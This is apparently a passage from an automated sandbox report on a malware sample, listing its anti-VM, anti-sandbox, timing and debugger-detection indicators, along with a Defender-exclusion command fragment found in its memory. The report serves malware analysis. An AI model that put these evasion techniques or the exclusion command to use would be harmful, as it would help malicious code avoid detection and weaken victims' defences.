          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GiG35Rwmz6.exe PID: 6564, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000024198E4 second address: 00000000024198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 0000000002419B5E second address: 0000000002419B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exe TID: 6568Thread sleep time: -103004s >= -30000s
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exe TID: 6592Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6664Thread sleep time: -58000s >= -30000s
          Source: C:\Windows\SysWOW64\help.exe TID: 6552Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeThread delayed: delay time: 103004
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000005.00000000.703640273.000000000FC60000.00000004.00000001.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&]
          Source: explorer.exe, 00000005.00000000.698881312.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.698916741.000000000A64D000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.693172351.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.698881312.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.718413023.0000000004791000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Lo==
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.718312976.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000005.00000000.699012653.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000005.00000000.699084380.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000005.00000000.692584557.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\GiG35Rwmz6.exeCode function: 4_2_0040ACD0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02A9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02ABA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02AB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 9_2_02B051BE mov eax, dword ptr fs:[00000030h]
